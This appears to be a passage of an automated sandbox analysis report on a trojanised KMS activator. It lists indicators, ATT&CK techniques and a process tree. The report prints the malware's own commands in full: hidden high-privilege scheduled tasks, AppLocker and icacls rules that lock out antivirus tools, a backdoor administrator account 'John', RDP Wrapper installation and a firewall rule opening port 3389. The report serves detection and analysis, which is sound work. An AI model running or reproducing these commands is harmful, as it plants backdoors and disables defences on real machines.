File opened for modification	C:\Program Files\ReasonLabs	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\Ravantivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files (x86)\IObit\IObit Malware Fighter	update.exe
File opened for modification	C:\Program Files (x86)\Transmission	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\SUPERAntiSpyware	update.exe
File opened for modification	C:\Program Files\RogueKiller	update.exe
File opened for modification	C:\Program Files (x86)\SpeedFan	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\Common Files\Doctor Web	update.exe
File opened for modification	C:\Program Files\Process Hacker 2	update.exe
File opened for modification	C:\Program Files\NETGATE	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File opened for modification	C:\Program Files (x86)\IObit\Advanced SystemCare	update.exe
File opened for modification	C:\Program Files\EnigmaSoft	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\HitmanPro	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\Common Files\AV	update.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files (x86)\GPU Temp	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\AVG	update.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\logs\StorGroupPolicy.log	svchost.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2800	sc.exe
3888	sc.exe
3220	sc.exe
3212	sc.exe
5004	sc.exe
4676	sc.exe
5112	sc.exe
4276	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	W10DigitalActivation.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7zaxxx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7zaxxx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWinst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3952	timeout.exe
2516	timeout.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3644	schtasks.exe
5088	schtasks.exe
5052	schtasks.exe
1192	schtasks.exe
976	schtasks.exe
1652	schtasks.exe
2800	schtasks.exe
2356	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
4008	KMSTools Lite.exe
2720	update.exe
2720	update.exe
2720	update.exe
2720	update.exe
2720	update.exe
2720	update.exe
2720	update.exe
2720	update.exe
5028	powershell.exe
5028	powershell.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
4608	smss.exe
1844	IP.exe
1844	IP.exe
1844	IP.exe
1844	IP.exe
1844	IP.exe
1844	IP.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2156	GSetup.exe
988	unsecapp.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
676	Process not Found
676	Process not Found

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: 33	1688	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1688	AUDIODG.EXE
Token: SeRestorePrivilege	3208	7zaxxx.exe
Token: 35	3208	7zaxxx.exe
Token: SeSecurityPrivilege	3208	7zaxxx.exe
Token: SeSecurityPrivilege	3208	7zaxxx.exe
Token: SeRestorePrivilege	1992	7zaxxx.exe
Token: 35	1992	7zaxxx.exe
Token: SeSecurityPrivilege	1992	7zaxxx.exe
Token: SeSecurityPrivilege	1992	7zaxxx.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	3780	winserv.exe
Token: SeTakeOwnershipPrivilege	4276	winserv.exe
Token: SeTcbPrivilege	4276	winserv.exe
Token: SeTcbPrivilege	4276	winserv.exe
Token: SeDebugPrivilege	3428	RDPWinst.exe
Token: SeAuditPrivilege	1092	svchost.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
2156	GSetup.exe
2156	GSetup.exe
2156	GSetup.exe
2156	GSetup.exe
2156	GSetup.exe
2156	GSetup.exe
2156	GSetup.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2156	GSetup.exe
2156	GSetup.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
4908	KMS.exe
2720	update.exe
2100	win.exe
2376	svchost.exe
1844	IP.exe
4608	smss.exe
3780	winserv.exe
3780	winserv.exe
3780	winserv.exe
3780	winserv.exe
3780	winserv.exe
4276	winserv.exe
4276	winserv.exe
4276	winserv.exe
4276	winserv.exe
3428	RDPWinst.exe
1956	winserv.exe
1956	winserv.exe
1956	winserv.exe
1956	winserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 2156	4008	KMSTools Lite.exe	81
PID 4008 wrote to memory of 2156	4008	KMSTools Lite.exe	81
PID 4008 wrote to memory of 2156	4008	KMSTools Lite.exe	81
PID 2156 wrote to memory of 1108	2156	GSetup.exe	84
PID 2156 wrote to memory of 1108	2156	GSetup.exe	84
PID 4008 wrote to memory of 3456	4008	KMSTools Lite.exe	89
PID 4008 wrote to memory of 3456	4008	KMSTools Lite.exe	89
PID 4008 wrote to memory of 3456	4008	KMSTools Lite.exe	89
PID 3456 wrote to memory of 4908	3456	install.exe	91
PID 3456 wrote to memory of 4908	3456	install.exe	91
PID 3456 wrote to memory of 2720	3456	install.exe	93
PID 3456 wrote to memory of 2720	3456	install.exe	93
PID 2156 wrote to memory of 3208	2156	GSetup.exe	96
PID 2156 wrote to memory of 3208	2156	GSetup.exe	96
PID 2156 wrote to memory of 3208	2156	GSetup.exe	96
PID 2156 wrote to memory of 1780	2156	GSetup.exe	99
PID 2156 wrote to memory of 1780	2156	GSetup.exe	99
PID 2720 wrote to memory of 1192	2720	update.exe	100
PID 2720 wrote to memory of 1192	2720	update.exe	100
PID 2720 wrote to memory of 976	2720	update.exe	102
PID 2720 wrote to memory of 976	2720	update.exe	102
PID 2720 wrote to memory of 1652	2720	update.exe	104
PID 2720 wrote to memory of 1652	2720	update.exe	104
PID 2720 wrote to memory of 2800	2720	update.exe	106
PID 2720 wrote to memory of 2800	2720	update.exe	106
PID 2720 wrote to memory of 2356	2720	update.exe	108
PID 2720 wrote to memory of 2356	2720	update.exe	108
PID 2720 wrote to memory of 2100	2720	update.exe	110
PID 2720 wrote to memory of 2100	2720	update.exe	110
PID 2720 wrote to memory of 2100	2720	update.exe	110
PID 2156 wrote to memory of 1992	2156	GSetup.exe	111
PID 2156 wrote to memory of 1992	2156	GSetup.exe	111
PID 2156 wrote to memory of 1992	2156	GSetup.exe	111
PID 2720 wrote to memory of 4208	2720	update.exe	113
PID 2720 wrote to memory of 4208	2720	update.exe	113
PID 4208 wrote to memory of 5112	4208	cmd.exe	115
PID 4208 wrote to memory of 5112	4208	cmd.exe	115
PID 2720 wrote to memory of 1468	2720	update.exe	116
PID 2720 wrote to memory of 1468	2720	update.exe	116
PID 2720 wrote to memory of 1056	2720	update.exe	117
PID 2720 wrote to memory of 1056	2720	update.exe	117
PID 1468 wrote to memory of 4276	1468	cmd.exe	120
PID 1468 wrote to memory of 4276	1468	cmd.exe	120
PID 1056 wrote to memory of 5028	1056	cmd.exe	121
PID 1056 wrote to memory of 5028	1056	cmd.exe	121
PID 2156 wrote to memory of 60	2156	GSetup.exe	122
PID 2156 wrote to memory of 60	2156	GSetup.exe	122
PID 2156 wrote to memory of 60	2156	GSetup.exe	122
PID 2720 wrote to memory of 3644	2720	update.exe	125
PID 2720 wrote to memory of 3644	2720	update.exe	125
PID 2720 wrote to memory of 752	2720	update.exe	127
PID 2720 wrote to memory of 752	2720	update.exe	127
PID 2720 wrote to memory of 3380	2720	update.exe	129
PID 2720 wrote to memory of 3380	2720	update.exe	129
PID 3380 wrote to memory of 5060	3380	cmd.exe	131
PID 3380 wrote to memory of 5060	3380	cmd.exe	131
PID 2720 wrote to memory of 2376	2720	update.exe	132
PID 2720 wrote to memory of 2376	2720	update.exe	132
PID 2720 wrote to memory of 2376	2720	update.exe	132
PID 2376 wrote to memory of 1844	2376	svchost.exe	133
PID 2376 wrote to memory of 1844	2376	svchost.exe	133
PID 2376 wrote to memory of 4608	2376	svchost.exe	134
PID 2376 wrote to memory of 4608	2376	svchost.exe	134
PID 4608 wrote to memory of 5088	4608	smss.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\KMSTools Lite.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\GSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\GSetup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y
    3⤵
    PID:1108
- - C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs" "Office Installer+"*
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3208
- - C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe
    "C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"
    3⤵
    - Executes dropped EXE
    PID:1780
- - C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- - C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe
    "C:\Users\Admin\AppData\Local\Temp\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:60
- C:\ProgramData\Setup\install.exe
  C:\ProgramData\Setup\install.exe -palexpassword
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\ProgramData\Setup\KMS.exe
    "C:\ProgramData\Setup\KMS.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Blocks application from running via registry modification
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:4908
- - C:\ProgramData\Setup\update.exe
    "C:\ProgramData\Setup\update.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1192
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckUP" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:976
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\Filesystem" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1652
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2800
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2356
  - - C:\ProgramData\Microsoft\win.exe
      C:\ProgramData\Microsoft\win.exe -ppidar
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4208
    - - C:\Windows\system32\sc.exe
        
        sc start appidsvc
        5⤵
        Launches sc.exe
        
        PID:5112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\system32\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        Launches sc.exe
        
        PID:4276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\RecoveryManagerM\RecoveryHosts" /TR "C:\ProgramData\Microsoft\MapData\WjpoUFfwQWh7RK\RecoveryManagerM.bat" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5060
  - - C:\ProgramData\Setup\svchost.exe
      C:\ProgramData\Setup\svchost.exe -ppidar
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\ProgramData\Setup\IP.exe
        
        "C:\ProgramData\Setup\IP.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1844
      - C:\Windows\SysWOW64\unsecapp.exe
        
        C:\Windows\SysWOW64\unsecapp.exe
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
        6⤵
        Drops file in Drivers directory
        
        PID:4672
    - - C:\ProgramData\Setup\smss.exe
        
        "C:\ProgramData\Setup\smss.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        Checks processor information in registry
        Modifies registry class
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4608
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5088
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5052
      - C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3780
        
        C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net user John 12345 /add
        6⤵
        
        PID:1608
        
        C:\Windows\system32\net.exe
        
        net user John 12345 /add
        7⤵
        
        PID:2780
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user John 12345 /add
        8⤵
        
        PID:4772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
        6⤵
        
        PID:2808
        
        C:\Windows\system32\net.exe
        
        net localgroup "Администраторы" John /add
        7⤵
        
        PID:3904
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" John /add
        8⤵
        
        PID:3752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
        6⤵
        
        PID:4688
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        7⤵
        
        PID:2888
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        8⤵
        
        PID:2272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
        6⤵
        
        PID:3644
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного управления" john /add" John /add
        7⤵
        
        PID:952
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
        8⤵
        
        PID:4944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
        6⤵
        
        PID:2904
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administrators" John /add
        7⤵
        
        PID:3156
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        8⤵
        
        PID:2492
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
        6⤵
        
        PID:1068
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administradores" John /add
        7⤵
        
        PID:4812
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        8⤵
        
        PID:2932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
        6⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1852
        
        C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" john /add
        7⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:4264
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1120
      - C:\ProgramData\RDPWinst.exe
        
        C:\ProgramData\RDPWinst.exe -i
        6⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3428
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        6⤵
        
        PID:1016
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        7⤵
        Delays execution with timeout.exe
        
        PID:3952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3392
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:4420
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:2236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:540
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1068
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:5044
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3684
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3644
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1124
